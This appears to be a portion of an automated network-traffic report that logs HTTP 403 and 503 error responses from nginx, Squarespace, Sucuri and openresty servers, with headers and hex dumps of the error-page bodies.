                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:36 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveX-Seen-By: RQvnDyN5n1orR2cJk2hJbg==,m0j2EEknGIVUW/liY8BLLrjAMl1QewRKjWjp2YfgqGDDa2gaReObvoMyILa0JRsyX-Wix-Request-Id: 1690487676.191463822581224293X-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:54:36 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: 2DHrEyfG/VJ8K2OmFData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:54:36 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BcU/8/tJrI+pMjU4YWYwMzk0ZDE0ZDVlYzRmMTc2ZDQ2OWM4MTgx;Path=/X-Contextid: sUZJVop3/ICT8F3jcData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Thu, 27 Jul 2023 19:54:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 63 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Thu, 27 Jul 2023 19:54:37 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:54:37 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=Be62utQLM1fhMGJiZmQ4Zjc4ZDJkM2M1MmY5NWYxYzJjMzQwMDZk;Path=/X-Contextid: cuobC2IX/1mW2s77IData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Thu, 27 Jul 2023 19:54:37 GMTContent-Type: text/htmlContent-Length: 918Connection: keep-aliveLast-Modified: Mon, 27 Jan 2020 20:24:24 GMTETag: "396-59d24e4b2e24e"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 35 30 33 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 65 20 73 65 72 76 65 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 6d 61 69 6e 74 65 6e 61 6e 63 65 20 64 6f 77 6e 74 69 6d 65 20 6f 72 20 63 61 70 61 63 69 74 79 20 70 72 6f 62 6c 65 6d 73 2e 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f
